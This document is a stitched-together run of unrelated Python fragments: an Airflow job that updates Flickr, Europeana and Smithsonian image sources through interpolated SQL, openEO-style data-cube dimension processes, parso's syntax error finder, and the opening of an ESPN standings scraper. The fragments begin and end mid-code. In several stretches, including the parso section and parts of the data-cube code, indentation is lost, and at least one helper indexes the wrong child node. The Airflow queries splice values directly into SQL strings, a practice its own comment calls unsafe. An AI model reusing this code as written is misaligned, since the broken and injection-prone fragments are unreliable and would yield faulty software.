    Set the source column for Flickr images whose creator URL belongs to a
    known sub-provider, using a temporary mapping table that is dropped
    again afterwards.
    """
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    temp_table = _create_temp_flickr_sub_prov_table(postgres_conn_id)

    select_query = dedent(
        f'''
        SELECT
          {col.FOREIGN_ID} AS foreign_id,
          public.{temp_table}.sub_provider AS sub_provider
        FROM {image_table}
        INNER JOIN public.{temp_table}
        ON
          {image_table}.{col.CREATOR_URL} = public.{temp_table}.{col.CREATOR_URL}
          AND
          {image_table}.{col.PROVIDER} = '{default_provider}';
        '''
    )

    selected_records = postgres.get_records(select_query)
    logger.info(f'Updating {len(selected_records)} records')

    # Rows are (foreign_id, sub_provider); unpack directly.
    for foreign_id, sub_provider in selected_records:
        postgres.run(
            dedent(
                f'''
                UPDATE {image_table}
                SET {col.SOURCE} = '{sub_provider}'
                WHERE
                  {image_table}.{col.PROVIDER} = '{default_provider}'
                  AND
                  MD5({image_table}.{col.FOREIGN_ID}) = MD5('{foreign_id}');
                '''
            )
        )

    # Drop the temporary table.
    postgres.run(f'DROP TABLE public.{temp_table};')
def _create_temp_europeana_sub_prov_table(
        postgres_conn_id,
        temp_table='temp_eur_sub_prov_table'
):
    """
    (Re)create and populate a temporary table mapping Europeana data
    providers to sub-provider names, and return the table's name.
    """
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    # Drop the temporary table if it already exists.
    postgres.run(f'DROP TABLE IF EXISTS public.{temp_table};')
    # Create intermediary table for sub provider migration.
    postgres.run(
        dedent(
            f'''
            CREATE TABLE public.{temp_table} (
              data_provider character varying(120),
              sub_provider character varying(80)
            );
            '''
        )
    )
    postgres.run(
        f'ALTER TABLE public.{temp_table} OWNER TO {DB_USER_NAME};'
    )
    # Populate the intermediary table with the sub providers of interest.
    for sub_prov, data_provider in prov.EUROPEANA_SUB_PROVIDERS.items():
        # NOTE(review): values are interpolated directly into the SQL; they
        # come from our configuration, but parameterized queries are safer.
        postgres.run(
            dedent(
                f'''
                INSERT INTO public.{temp_table} (
                  data_provider,
                  sub_provider
                )
                VALUES (
                  '{data_provider}',
                  '{sub_prov}'
                );
                '''
            )
        )
    return temp_table
def update_europeana_sub_providers(
        postgres_conn_id,
        image_table=IMAGE_TABLE_NAME,
        default_provider=prov.EUROPEANA_DEFAULT_PROVIDER,
        sub_providers=prov.EUROPEANA_SUB_PROVIDERS
):
    """
    Set the source column for Europeana images based on the 'dataProvider'
    entries in their metadata.

    Each selected row must correspond to exactly one sub-provider;
    otherwise an exception is raised.
    """
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    temp_table = _create_temp_europeana_sub_prov_table(postgres_conn_id)

    select_query = dedent(
        f'''
        SELECT L.foreign_id, L.data_providers, R.sub_provider
        FROM(
          SELECT
            {col.FOREIGN_ID} AS foreign_id,
            {col.META_DATA} ->> 'dataProvider' AS data_providers,
            {col.META_DATA}
          FROM {image_table}
          WHERE {col.PROVIDER} = '{default_provider}'
        ) L INNER JOIN
        {temp_table} R ON
        L.{col.META_DATA} ->'dataProvider' ? R.data_provider;
        '''
    )
    selected_records = postgres.get_records(select_query)

    # Update each selected row if it corresponds to exactly one
    # sub-provider; otherwise raise.
    for foreign_id, raw_data_providers, sub_provider in selected_records:
        data_providers = json.loads(raw_data_providers)
        eligible_sub_providers = {
            s for s in sub_providers if sub_providers[s] in data_providers
        }
        if len(eligible_sub_providers) > 1:
            raise Exception(f"More than one sub-provider identified for the "
                            f"image with foreign ID {foreign_id}")
        # The original used `assert` for these checks, which disappears
        # under `python -O`; validate explicitly instead.
        if not eligible_sub_providers:
            raise Exception(f"No sub-provider identified for the "
                            f"image with foreign ID {foreign_id}")
        if eligible_sub_providers.pop() != sub_provider:
            raise Exception(f"Sub-provider mismatch for the "
                            f"image with foreign ID {foreign_id}")

        postgres.run(
            dedent(
                f'''
                UPDATE {image_table}
                SET {col.SOURCE} = '{sub_provider}'
                WHERE
                  {image_table}.{col.PROVIDER} = '{default_provider}'
                  AND
                  MD5({image_table}.{col.FOREIGN_ID}) = MD5('{foreign_id}');
                '''
            )
        )

    # Drop the temporary table.
    postgres.run(f'DROP TABLE public.{temp_table};')
def update_smithsonian_sub_providers(
        postgres_conn_id,
        image_table=IMAGE_TABLE_NAME,
        default_provider=prov.SMITHSONIAN_DEFAULT_PROVIDER,
        sub_providers=prov.SMITHSONIAN_SUB_PROVIDERS
):
    """
    Replace the default Smithsonian source value with the sub-provider
    derived from each image's 'unit_code' metadata entry.
    """
    postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
    # Select all records where the source value is not yet updated.
    select_query = dedent(
        f'''
        SELECT {col.FOREIGN_ID},
          {col.META_DATA} ->> 'unit_code' AS unit_code
        FROM {image_table}
        WHERE
          {col.PROVIDER} = '{default_provider}'
          AND
          {col.SOURCE} = '{default_provider}';
        '''
    )
    selected_records = postgres.get_records(select_query)

    # Set the source value of each selected row to the sub-provider value
    # corresponding to its unit code. Unknown unit codes are an error.
    for foreign_id, unit_code in selected_records:
        source = next(
            (s for s in sub_providers if unit_code in sub_providers[s]),
            None
        )
        if source is None:
            raise Exception(
                f"An unknown unit code value {unit_code} encountered ")
        postgres.run(
            dedent(
                f'''
                UPDATE {image_table}
                SET {col.SOURCE} = '{source}'
                WHERE
                  {image_table}.{col.PROVIDER} = '{default_provider}'
                  AND
                  MD5({image_table}.{col.FOREIGN_ID}) = MD5('{foreign_id}');
                '''
            )
        )
def expire_old_images(
postgres_conn_id,
provider,
image_table=IMAGE_TABLE_NAME
):
postgres = PostgresHook(postgres_conn_id=postgres_conn_id)
if provider not in OLDEST_PER_PROVIDER:
raise Exception(
f"Provider value {provider} not defined in the "
f"OLDEST_PER_PROVIDER dictionary")
"""
| |
implementations inside
`resample_cube_spatial`.
Returns
-------
save_result :
Class instance implementing 'resample_cube_spatial' process.
"""
return ResampleCubeSpatial()
class ResampleCubeSpatial:
    """
    Class implementing the 'resample_cube_spatial' process.
    """

    @staticmethod
    def exec_xar(data, target, method, options=None):
        """
        Resample the spatial dimensions of `data` to match `target`.

        Parameters
        ----------
        data : xr.DataArray
            A data cube.
        target : xr.DataArray
            A data cube that describes the spatial target resolution
            (its `.geobox` is used).
        method : str
            Resampling method, inspired by GDAL (see
            https://www.gdal.org/gdalwarp.html); one of
            "near","bilinear","cubic","cubicspline","lanczos","average",
            "mode","max","min","med","q1","q3" (default: near).
        options : dict, optional
            Accepted for API compatibility; currently unused. (Was a
            mutable default `{}` — now None.)
        """
        methods_list = [
            "near", "bilinear", "cubic", "cubicspline", "lanczos",
            "average", "mode", "max", "min", "med", "q1", "q3",
        ]
        if method is None or method == 'near':
            # odc/rasterio spells nearest-neighbour 'nearest'.
            method = 'nearest'
        elif method not in methods_list:
            raise Exception(
                f"Selected resampling method \"{method}\" is not available! "
                f"Please select one of [{', '.join(methods_list)}]"
            )
        # The original wrapped this in `try: ... except Exception as e:
        # raise e`, which is a no-op; removed.
        return odc.algo._warp.xr_reproject(
            data, target.geobox, resampling=method
        )
###############################################################################
# Resample cube temporal process
###############################################################################
@process
def resample_cube_temporal():
    """
    Returns class instance of `ResampleCubeTemporal`.

    For more details, please have a look at the implementations inside
    `ResampleCubeTemporal`.

    Returns
    -------
    ResampleCubeTemporal :
        Class instance implementing the 'resample_cube_temporal' process.
    """
    return ResampleCubeTemporal()
class ResampleCubeTemporal:
    """
    Class implementing the 'resample_cube_temporal' process.
    """

    @staticmethod
    def exec_xar(data, target, dimension=None, valid_within=None):
        """
        Resample the temporal dimension of `data` to align with `target`
        using nearest-neighbour matching.

        Ties are resolved by choosing the earlier timestamp (the first
        minimum), per the process specification.

        Parameters
        ----------
        data : xr.DataArray
            A data cube.
        target : xr.DataArray
            A data cube that describes the temporal target resolution.
        dimension : str, optional
            Name of the temporal dimension to resample; defaults to the
            cube's time dimension. Raises DimensionNotAvailable for any
            non-temporal name.
        valid_within : number, optional
            If set, only values whose original timestamp lies within this
            many days of the assigned target timestamp are kept; others are
            dropped.
        """
        if dimension is None:
            dimension = 'time'
        if dimension in ['time', 't', 'times']:
            # Time-dimension aliases must be mapped to the dataset's actual
            # temporal dimension name.
            dimension = get_time_dimension_from_data(data, dimension)
        else:
            raise Exception('DimensionNotAvailable')

        if len(data[dimension].values) >= len(target[dimension].values):
            # More source than target timestamps: relabel each source
            # timestamp with its nearest target timestamp.
            # np.argmin returns the FIRST minimum, so ties pick the earlier
            # target (the original np.argwhere could return several indices
            # and misalign the coordinate array).
            nearest_indices = [
                int(np.argmin(np.abs(d - target[dimension].values)))
                for d in data[dimension].values
            ]
            new_labels = [
                target[dimension].values[i] for i in nearest_indices
            ]
            filter_values = data[dimension].values
            # WARNING: shallow copy — assigning coordinates below also
            # mutates `data` (as in the original implementation).
            new_data = data
            new_data[dimension] = new_labels
        else:
            # Fewer source than target timestamps: pick, for every target
            # timestamp, the nearest source slice.
            nearest_indices = [
                int(np.argmin(np.abs(d - data[dimension].values)))
                for d in target[dimension].values
            ]
            data_t = data.transpose(dimension, ...)
            new_data = data_t[nearest_indices]
            new_data = new_data.transpose(*data.dims)
            filter_values = new_data[dimension].values
            new_data[dimension] = target[dimension].values

        if valid_within is not None:
            # Keep only values whose original timestamp lies within
            # `valid_within` days of the assigned target timestamp.
            # (`valid_mask` replaces the original `filter`, which shadowed
            # the builtin.)
            limit = np.timedelta64(valid_within, 'D')
            valid_mask = (
                np.abs(filter_values - new_data[dimension].values) <= limit
            )
            new_data_t = new_data.transpose(dimension, ...)
            new_data_t = new_data_t[valid_mask]
            new_data = new_data_t.transpose(*new_data.dims)

        new_data.attrs = data.attrs
        return new_data
###############################################################################
# CreateRasterCube process
###############################################################################
@process
def create_raster_cube():
    """
    Create an empty raster data cube.

    Returns
    -------
    CreateRasterCube :
        Class instance implementing the 'create_raster_cube' process, which
        creates a new raster data cube without dimensions. Dimensions can
        be added with add_dimension.
    """
    return CreateRasterCube()
class CreateRasterCube:
    """
    Creates a new raster data cube without dimensions. Dimensions can be
    added with add_dimension.
    """
    @staticmethod
    def exec_num():
        """
        Parameters
        ----------
        This process has no parameters.

        Returns
        -------
        xr.DataArray :
            An empty raster data cube with zero dimensions.
        """
        # An empty DataArray serves as the dimensionless starting cube.
        return xr.DataArray([])
###############################################################################
# AddDimension process
###############################################################################
@process
def add_dimension():
    """
    Adds a new named dimension to the data cube.

    Returns
    -------
    AddDimension :
        Class instance implementing the 'add_dimension' process. The
        resulting data cube has a newly added dimension with exactly one
        dimension label; all other dimensions remain unchanged.
    """
    return AddDimension()
class AddDimension:
    """
    Adds a new named dimension to the data cube.

    Afterwards, the dimension can be referred to with the specified name.
    If a dimension with the specified name exists, the process fails with a
    DimensionExists exception. The dimension label of the dimension is set
    to the specified label.
    """

    @staticmethod
    def exec_xar(data, name, labels, type='other'):
        """
        Parameters
        ----------
        data : xr.DataArray
            A data cube to add the dimension to.
        name : str
            Name for the dimension.
        labels : number, str
            A dimension label.
        type : str, optional
            The type of dimension, defaults to 'other' (currently unused).

        Returns
        -------
        xr.DataArray :
            The data cube with a newly added dimension that has exactly one
            dimension label. All other dimensions remain unchanged.
        """
        # Enforce the documented DimensionExists contract up front instead
        # of failing obscurely inside the rename below.
        if name in data.dims:
            raise Exception('DimensionExists')
        expanded = data.assign_coords(placeholder=labels)
        expanded = expanded.expand_dims('placeholder')
        return expanded.rename({'placeholder': name})
###############################################################################
# DimensionLabels process
###############################################################################
@process
def dimension_labels():
    """
    Get the dimension labels.

    Returns
    -------
    DimensionLabels :
        Class instance implementing the 'dimension_labels' process, which
        returns the labels of a dimension as an array.
    """
    return DimensionLabels()
class DimensionLabels:
    """
    Gives all labels for a dimension in the data cube, in the same order as
    in the data cube. If a dimension with the specified name does not
    exist, the process fails with a DimensionNotAvailable exception.
    """

    @staticmethod
    def exec_xar(data, dimension):
        """
        Parameters
        ----------
        data : xr.DataArray
            A data cube.
        dimension : str
            The name of the dimension to get the labels for.

        Returns
        -------
        np.array :
            The labels as an array.
        """
        if dimension in ('time', 't', 'times'):
            # Time aliases map to the cube's actual temporal dimension name.
            dimension = get_time_dimension_from_data(data, dimension)
        elif dimension not in data.dims:
            raise Exception('DimensionNotAvailable')
        return data[dimension].values
###############################################################################
# DropDimension process
###############################################################################
@process
def drop_dimension():
    """
    Remove a dimension.

    Returns
    -------
    DropDimension :
        Class instance implementing the 'drop_dimension' process, which
        returns a data cube without the specified dimension.
    """
    return DropDimension()
class DropDimension:
    """
    Drops a dimension from the data cube.

    Dropping only works on dimensions with a single dimension label left,
    otherwise the process fails with a DimensionLabelCountMismatch
    exception. If a dimension with the specified name does not exist, the
    process fails with a DimensionNotAvailable exception.
    """

    @staticmethod
    def exec_xar(data, name):
        """
        Parameters
        ----------
        data : xr.DataArray
            The data cube to drop a dimension from.
        name : str
            Name of the dimension to drop.

        Returns
        -------
        xr.DataArray :
            A data cube without the specified dimension; all other
            dimension properties remain unchanged.
        """
        # Guard clauses instead of nested if/else.
        if name not in data.dims:
            raise Exception('DimensionNotAvailable')
        if len(data[name].values) != 1:
            raise Exception('DimensionLabelCountMismatch')
        return data.squeeze(name, drop=True)
###############################################################################
# RenameDimension process
###############################################################################
@process
def rename_dimension():
    """
    Rename a dimension.

    Returns
    -------
    RenameDimension :
        Class instance implementing the 'rename_dimension' process. The
        result is a data cube with the same dimensions, but the name of one
        of the dimensions changes; the old name can not be referred to any
        longer. The dimension properties (name, type, labels, reference
        system and resolution) remain unchanged.
    """
    return RenameDimension()
class RenameDimension:
"""
Renames a dimension in the data cube while preserving all other properties.
"""
@staticmethod
def exec_xar(data, source, target):
"""
Parameters
----------
data : xr.DataArray
A data cube.
source : str
The current name of the dimension.
Fails | |
<gh_stars>100-1000
# -*- coding: utf-8 -*-
import codecs
import warnings
import re
from contextlib import contextmanager
from parso.normalizer import Normalizer, NormalizerConfig, Issue, Rule
from parso.python.tree import search_ancestor
from parso.parser import ParserSyntaxError
_BLOCK_STMTS = ('if_stmt', 'while_stmt', 'for_stmt', 'try_stmt', 'with_stmt')
_STAR_EXPR_PARENTS = ('testlist_star_expr', 'testlist_comp', 'exprlist')
# This is the maximal block size given by python.
_MAX_BLOCK_SIZE = 20
_MAX_INDENT_COUNT = 100
ALLOWED_FUTURES = (
'all_feature_names', 'nested_scopes', 'generators', 'division',
'absolute_import', 'with_statement', 'print_function', 'unicode_literals',
)
def _iter_stmts(scope):
"""
Iterates over all statements and splits up simple_stmt.
"""
for child in scope.children:
if child.type == 'simple_stmt':
for child2 in child.children:
if child2.type == 'newline' or child2 == ';':
continue
yield child2
else:
yield child
def _get_comprehension_type(atom):
first, second = atom.children[:2]
if second.type == 'testlist_comp' and second.children[1].type == 'comp_for':
if first == '[':
return 'list comprehension'
else:
return 'generator expression'
elif second.type == 'dictorsetmaker' and second.children[-1].type == 'comp_for':
if second.children[1] == ':':
return 'dict comprehension'
else:
return 'set comprehension'
return None
def _is_future_import(import_from):
# It looks like a __future__ import that is relative is still a future
# import. That feels kind of odd, but whatever.
# if import_from.level != 0:
# return False
from_names = import_from.get_from_names()
return [n.value for n in from_names] == ['__future__']
def _remove_parens(atom):
"""
Returns the inner part of an expression like `(foo)`. Also removes nested
parens.
"""
try:
children = atom.children
except AttributeError:
pass
else:
if len(children) == 3 and children[0] == '(':
return _remove_parens(atom.children[1])
return atom
def _iter_params(parent_node):
return (n for n in parent_node.children if n.type == 'param')
def _is_future_import_first(import_from):
    """
    Checks if the import is the first statement of a file.

    The module docstring and any preceding __future__ imports are allowed
    before it; any other statement makes this return False.
    """
    found_docstring = False
    for stmt in _iter_stmts(import_from.get_root_node()):
        # Skip at most one leading string (the module docstring).
        if stmt.type == 'string' and not found_docstring:
            continue
        found_docstring = True

        if stmt == import_from:
            return True
        # Earlier __future__ imports are fine; anything else is not.
        if stmt.type == 'import_from' and _is_future_import(stmt):
            continue
        return False
def _iter_definition_exprs_from_lists(exprlist):
for child in exprlist.children[::2]:
if child.type == 'atom' and child.children[0] in ('(', '['):
testlist_comp = child.children[0]
if testlist_comp.type == 'testlist_comp':
for expr in _iter_definition_exprs_from_lists(testlist_comp):
yield expr
continue
elif child.children[0] == '[':
yield testlist_comp
continue
yield child
def _get_expr_stmt_definition_exprs(expr_stmt):
    """Collect the assignment targets of an expr_stmt (everything but the
    final right-hand side)."""
    exprs = []
    # children[:-2:2] skips the '=' separators and the RHS expression.
    for target_list in expr_stmt.children[:-2:2]:
        if target_list.type in ('testlist_star_expr', 'testlist'):
            exprs.extend(_iter_definition_exprs_from_lists(target_list))
        else:
            exprs.append(target_list)
    return exprs
def _get_for_stmt_definition_exprs(for_stmt):
    """Return the loop-target expressions of a for statement."""
    exprlist = for_stmt.children[1]
    if exprlist.type == 'exprlist':
        return list(_iter_definition_exprs_from_lists(exprlist))
    # A single target (no comma) is returned as a one-element list.
    return [exprlist]
class _Context(object):
def __init__(self, node, add_syntax_error, parent_context=None):
self.node = node
self.blocks = []
self.parent_context = parent_context
self._used_name_dict = {}
self._global_names = []
self._nonlocal_names = []
self._nonlocal_names_in_subscopes = []
self._add_syntax_error = add_syntax_error
def is_async_funcdef(self):
# Stupidly enough async funcdefs can have two different forms,
# depending if a decorator is used or not.
return self.is_function() \
and self.node.parent.type in ('async_funcdef', 'async_stmt')
def is_function(self):
return self.node.type == 'funcdef'
def add_name(self, name):
parent_type = name.parent.type
if parent_type == 'trailer':
# We are only interested in first level names.
return
if parent_type == 'global_stmt':
self._global_names.append(name)
elif parent_type == 'nonlocal_stmt':
self._nonlocal_names.append(name)
else:
self._used_name_dict.setdefault(name.value, []).append(name)
def finalize(self):
"""
Returns a list of nonlocal names that need to be part of that scope.
"""
self._analyze_names(self._global_names, 'global')
self._analyze_names(self._nonlocal_names, 'nonlocal')
# Python2.6 doesn't have dict comprehensions.
global_name_strs = dict((n.value, n) for n in self._global_names)
for nonlocal_name in self._nonlocal_names:
try:
global_name = global_name_strs[nonlocal_name.value]
except KeyError:
continue
message = "name '%s' is nonlocal and global" % global_name.value
if global_name.start_pos < nonlocal_name.start_pos:
error_name = global_name
else:
error_name = nonlocal_name
self._add_syntax_error(error_name, message)
nonlocals_not_handled = []
for nonlocal_name in self._nonlocal_names_in_subscopes:
search = nonlocal_name.value
if search in global_name_strs or self.parent_context is None:
message = "no binding for nonlocal '%s' found" % nonlocal_name.value
self._add_syntax_error(nonlocal_name, message)
elif not self.is_function() or \
nonlocal_name.value not in self._used_name_dict:
nonlocals_not_handled.append(nonlocal_name)
return self._nonlocal_names + nonlocals_not_handled
def _analyze_names(self, globals_or_nonlocals, type_):
def raise_(message):
self._add_syntax_error(base_name, message % (base_name.value, type_))
params = []
if self.node.type == 'funcdef':
params = self.node.get_params()
for base_name in globals_or_nonlocals:
found_global_or_nonlocal = False
# Somehow Python does it the reversed way.
for name in reversed(self._used_name_dict.get(base_name.value, [])):
if name.start_pos > base_name.start_pos:
# All following names don't have to be checked.
found_global_or_nonlocal = True
parent = name.parent
if parent.type == 'param' and parent.name == name:
# Skip those here, these definitions belong to the next
# scope.
continue
if name.is_definition():
if parent.type == 'expr_stmt' \
and parent.children[1].type == 'annassign':
if found_global_or_nonlocal:
# If it's after the global the error seems to be
# placed there.
base_name = name
raise_("annotated name '%s' can't be %s")
break
else:
message = "name '%s' is assigned to before %s declaration"
else:
message = "name '%s' is used prior to %s declaration"
if not found_global_or_nonlocal:
raise_(message)
# Only add an error for the first occurence.
break
for param in params:
if param.name.value == base_name.value:
raise_("name '%s' is parameter and %s"),
@contextmanager
def add_block(self, node):
self.blocks.append(node)
yield
self.blocks.pop()
def add_context(self, node):
return _Context(node, self._add_syntax_error, parent_context=self)
def close_child_context(self, child_context):
self._nonlocal_names_in_subscopes += child_context.finalize()
class ErrorFinder(Normalizer):
    """
    Searches for errors in the syntax tree.
    """
    def __init__(self, *args, **kwargs):
        super(ErrorFinder, self).__init__(*args, **kwargs)
        # line number -> (code, message, node); only the first issue found
        # on each line is kept (see add_issue).
        self._error_dict = {}
        self.version = self.grammar.version_info

    def initialize(self, node):
        """Build the _Context chain for `node` and reset indent tracking."""
        def create_context(node):
            if node is None:
                return None

            parent_context = create_context(node.parent)
            if node.type in ('classdef', 'funcdef', 'file_input'):
                return _Context(node, self._add_syntax_error, parent_context)
            return parent_context

        self.context = create_context(node) or _Context(node, self._add_syntax_error)
        self._indentation_count = 0

    def visit(self, node):
        if node.type == 'error_node':
            with self.visit_node(node):
                # Don't need to investigate the inners of an error node. We
                # might find errors in there that should be ignored, because
                # the error node itself already shows that there's an issue.
                return ''
        return super(ErrorFinder, self).visit(node)

    @contextmanager
    def visit_node(self, node):
        self._check_type_rules(node)

        if node.type in _BLOCK_STMTS:
            with self.context.add_block(node):
                if len(self.context.blocks) == _MAX_BLOCK_SIZE:
                    self._add_syntax_error(node, "too many statically nested blocks")
                yield
            return
        elif node.type == 'suite':
            self._indentation_count += 1
            if self._indentation_count == _MAX_INDENT_COUNT:
                self._add_indentation_error(node.children[1], "too many levels of indentation")

        yield

        if node.type == 'suite':
            self._indentation_count -= 1
        elif node.type in ('classdef', 'funcdef'):
            # Leaving a class/function scope: pop its context and let the
            # parent absorb any unresolved nonlocal names.
            context = self.context
            self.context = context.parent_context
            self.context.close_child_context(context)

    def visit_leaf(self, leaf):
        if leaf.type == 'error_leaf':
            if leaf.token_type in ('INDENT', 'ERROR_DEDENT'):
                # Indents/Dedents itself never have a prefix. They are just
                # "pseudo" tokens that get removed by the syntax tree later.
                # Therefore in case of an error we also have to check for this.
                spacing = list(leaf.get_next_leaf()._split_prefix())[-1]
                if leaf.token_type == 'INDENT':
                    message = 'unexpected indent'
                else:
                    message = 'unindent does not match any outer indentation level'
                self._add_indentation_error(spacing, message)
            else:
                if leaf.value.startswith('\\'):
                    message = 'unexpected character after line continuation character'
                else:
                    # Distinguish an unterminated string from other junk by
                    # looking for an opening quote (with optional prefix).
                    match = re.match('\\w{,2}("{1,3}|\'{1,3})', leaf.value)
                    if match is None:
                        message = 'invalid syntax'
                    else:
                        if len(match.group(1)) == 1:
                            message = 'EOL while scanning string literal'
                        else:
                            message = 'EOF while scanning triple-quoted string literal'
                self._add_syntax_error(leaf, message)
            return ''
        elif leaf.value == ':':
            parent = leaf.parent
            if parent.type in ('classdef', 'funcdef'):
                # The ':' begins a class/function body; enter a new context.
                self.context = self.context.add_context(parent)

        # The rest is rule based.
        return super(ErrorFinder, self).visit_leaf(leaf)

    def _add_indentation_error(self, spacing, message):
        self.add_issue(spacing, 903, "IndentationError: " + message)

    def _add_syntax_error(self, node, message):
        self.add_issue(node, 901, "SyntaxError: " + message)

    def add_issue(self, node, code, message):
        # Overwrite the default behavior.
        # Check if the issues are on the same line; only the first issue
        # per line is recorded (setdefault keeps the existing entry).
        line = node.start_pos[0]
        args = (code, message, node)
        self._error_dict.setdefault(line, args)

    def finalize(self):
        self.context.finalize()

        for code, message, node in self._error_dict.values():
            self.issues.append(Issue(node, code, message))
class IndentationRule(Rule):
    """Base class for indentation issues; prefixes messages and uses the
    indentation error code 903."""
    code = 903

    def _get_message(self, message):
        message = super(IndentationRule, self)._get_message(message)
        return "IndentationError: " + message
@ErrorFinder.register_rule(type='error_node')
class _ExpectIndentedBlock(IndentationRule):
    """Reports a suite introducer whose following block is not indented."""
    message = 'expected an indented block'

    def get_node(self, node):
        # Report at the spacing before the next leaf — i.e. at the spot
        # where the indentation was expected.
        leaf = node.get_next_leaf()
        return list(leaf._split_prefix())[-1]

    def is_issue(self, node):
        # This is the beginning of a suite that is not indented.
        return node.children[-1].type == 'newline'
class ErrorFinderConfig(NormalizerConfig):
    """Normalizer configuration that plugs in the ErrorFinder."""
    normalizer_class = ErrorFinder
class SyntaxRule(Rule):
    """Base class for syntax issues; prefixes messages and uses the syntax
    error code 901."""
    code = 901

    def _get_message(self, message):
        message = super(SyntaxRule, self)._get_message(message)
        return "SyntaxError: " + message
@ErrorFinder.register_rule(type='error_node')
class _InvalidSyntaxRule(SyntaxRule):
    message = "invalid syntax"

    def get_node(self, node):
        # Attach the issue to the leaf immediately after the error node.
        return node.get_next_leaf()

    def is_issue(self, node):
        # Error leafs will be added later as an error; only report here
        # when the following leaf is an ordinary one.
        next_leaf = node.get_next_leaf()
        return next_leaf.type != 'error_leaf'
@ErrorFinder.register_rule(value='await')
class _AwaitOutsideAsync(SyntaxRule):
    message = "'await' outside async function"

    def is_issue(self, leaf):
        # 'await' is only legal when the current context is an async funcdef.
        return not self._normalizer.context.is_async_funcdef()

    def get_error_node(self, node):
        # Return the whole await statement.
        return node.parent
@ErrorFinder.register_rule(value='break')
class _BreakOutsideLoop(SyntaxRule):
    message = "'break' outside loop"

    def is_issue(self, leaf):
        # 'break' is an error unless some enclosing block is a loop.
        blocks = self._normalizer.context.blocks
        in_loop = any(block.type in ('for_stmt', 'while_stmt')
                      for block in blocks)
        return not in_loop
@ErrorFinder.register_rule(value='continue')
class _ContinueChecks(SyntaxRule):
message = "'continue' not properly in loop"
message_in_finally = "'continue' not supported inside 'finally' clause"
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 7 13:24:29 2017
@author: ejreidelbach
"""
#------------------------------------------------------------------------------
# Obtain Rankings and Standings Information from the ESPN website
# -----------------------------------------------------------------------------
# Import the Required Libraries
import pandas as pd
import requests
from bs4 import BeautifulSoup
import os
import re
# 11 teams don't have team names (`list_orig`) that match the official NCAA
# stats page (`list_new`); the two lists line up index-for-index.
list_orig = ["BYU","Florida Intl","Hawai'i","Louisiana","Louisiana Monroe",
             "Miami","UMass","NC State","SMU","Southern Mississippi","UT San Antonio"]
# NOTE(review): "<NAME>" looks like a redacted placeholder for BYU's official
# NCAA name — confirm before relying on this mapping.
list_new = ["<NAME>","Florida International","Hawaii","Louisiana-Lafayette",
            "Louisiana-Monroe","Miami (FL)","Massachusetts","North Carolina State",
            "Southern Methodist","Southern Miss","UTSA"]
###############################################################################
# Function Definitions
# The following two functions are sourced from for human-sorting purposes:
# https://stackoverflow.com/questions/5967500/how-to-correctly-sort-a-string-with-a-number-inside
def atof(text):
    """Convert *text* to float when possible, otherwise return it unchanged."""
    try:
        return float(text)
    except ValueError:
        return text
def natural_keys(text):
    '''
    alist.sort(key=natural_keys) sorts in human order
    http://nedbatchelder.com/blog/200712/human_sorting.html
    (See Toothy's implementation in the comments)
    float regex comes from https://stackoverflow.com/a/12643073/190597
    '''
    def _to_float(chunk):
        # Same conversion as atof(): numeric chunks become floats,
        # everything else stays a string.
        try:
            return float(chunk)
        except ValueError:
            return chunk

    parts = re.split(r'[+-]?([0-9]+(?:[.][0-9]*)?|[.][0-9]+)', text)
    return [_to_float(part) for part in parts]
def site_to_soup(url):
    """Fetch *url* with a desktop-browser User-Agent (ESPN blocks default
    client strings) and parse the response into a BeautifulSoup tree
    using the html.parser backend."""
    headers = {"User-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"}
    r = requests.get(url, headers=headers)
    soup = BeautifulSoup(r.content,'html.parser')
    return soup
def conf_standings(year=0):
    ''' This function will scrape the ESPN College Football standings pages
    and return all standings (i.e. wins/losses) for the specified year.
    Standings returned will be based on the year specified in the input.

    The function will also output a CSV file(s) to the `Conf Standings` folder.
        - each year will result in a separate file

    Years are currently limited to 2002 to PRESENT on ESPN.com.

    Input:
        year (int) - the year of the season being requested
            * a default value of 0 will return all available years

    Output:
        1.A) If the default value of 0 is supplied for year, a dataframe
        containing standings for all historical years on file will be returned.
        1.B) If a specific year is supplied, a dataframe containing the
        standings for that specific year will be returned.
        2.) A CSV file for each year that is scraped.
    '''
    # Scrape the main rankings page to establish links for specific weeks/years
    soup = site_to_soup("http://www.espn.com/college-football/standings")
    # Grab Year Information from the second dropdown menu on the page
    menu = soup.findAll('ul', class_='dropdown-menu med')[1]
    years_list = []
    years = menu.select('li')
    for yr in years:
        years_list.append(yr.text)
    # If the user did not enter a number or entered 0, grab all years.
    # Otherwise, confirm the year that the user entered is available for
    # scraping and then only grab that year.
    if str(year) == '0':
        pass
    elif str(year) in years_list:
        years_list = [str(year)]
    else:
        raise ValueError("Year entered is not in the range for ESPN's site.")
    dfStandingsAll = pd.DataFrame()
    # Grab Standing Information for the specified year(s)
    for year in years_list:
        print("Processing Rankings for Year: " + str(year))
        soup = site_to_soup("http://www.espn.com/college-football/standings/_/season/" + str(year))
        dfStandingsYear = pd.DataFrame()
        # Grab the column header information
        column_names = []
        column_names.append('Conference')   # Manually set the first item
        column_names.append('Division')     # Manually set the second item
        column_names.append('School')       # Manually set the third item
        headings = soup.findAll('thead', {'class':'standings-categories'})[1]
        cols = headings.findAll('span')[1:]  # We don't need the division name so start at 1
        for col in cols:
            column_names.append(col.text)
        column_names.append('Year')
        # Add Conf to the front of the Conference PF and PA columns
        column_names[4] = 'Conf PF'
        column_names[5] = 'Conf PA'
        # Add Over to the front of the Overall PF and PA columns
        column_names[7] = 'Over PF'
        column_names[8] = 'Over PA'
        # Grab all the conference names
        conferences = soup.findAll('h2', class_='table-caption')
        # Grab all the divisions within each conference
        standingsAll = soup.findAll('table', {'class':'standings has-team-logos'})
        conf_count = 0
        # Loop over each division in every conference and extract all ranking info
        for division in standingsAll:
            # setup storage variables
            division_list = []
            division_name = ''
            # move through each team in the division
            for row in division:
                team_list = []
                # Ignore rows that don't contain team/header information
                if len(row) > 11:
                    # Grab the name of the division we're scraping
                    if row['class'][0] == 'standings-categories':
                        cols = row.findAll('span')
                        division_name = cols[0].text
                    # Collect team information for each team in the division
                    elif row['class'][0] == '':
                        # Add in conference name
                        team_list.append(conferences[conf_count].text)
                        # Add in division name
                        team_list.append(division_name)
                        # Extract team name
